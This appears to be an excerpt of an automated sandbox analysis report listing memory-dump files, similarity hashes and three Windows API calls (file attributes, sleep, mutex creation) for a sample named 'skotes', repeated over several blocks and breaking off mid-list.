                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: ee0ba45947247255cf3aa99862829c8972bf6264c3fb37947a9a0b3738cc18f4
                                                                                                                                                                                                                                          • Instruction ID: e6d0f65513ca39171e840f11f5f1f411dba43625f98b653f588f65075835ca4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee0ba45947247255cf3aa99862829c8972bf6264c3fb37947a9a0b3738cc18f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 283113316041448BEF18DB6CDC99BADB7E2DBC6310F2486A9E128D72D5D7759A808712
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B79F47
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 10dc5ebc07b333de98be9d57a857829c9cce31ee723503067672f3dd11885efa
                                                                                                                                                                                                                                          • Instruction ID: 31339b47eb045e5f2dca8b7a955f93f691818de2df4abe9dc496cd1072c17323
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10dc5ebc07b333de98be9d57a857829c9cce31ee723503067672f3dd11885efa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 663128316041448BEB18EB6CDC9476CBBE2EBC6310F248699E16CDB2D5D775AA808752
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A07C
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: ac5cffc095f595ce74472030d7c822de0b8b594fbd09d8dd7e64a848e8432f4d
                                                                                                                                                                                                                                          • Instruction ID: 43b6ee73d8f7f04c6b4326bdbf5f896bc658c6e9e0084b93cdbb0f7c00916816
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac5cffc095f595ce74472030d7c822de0b8b594fbd09d8dd7e64a848e8432f4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6312331A041049BEB08DB6CDC89B6DBBE2DBC6310F208699E028A73D1D7769980C713
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A1B1
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
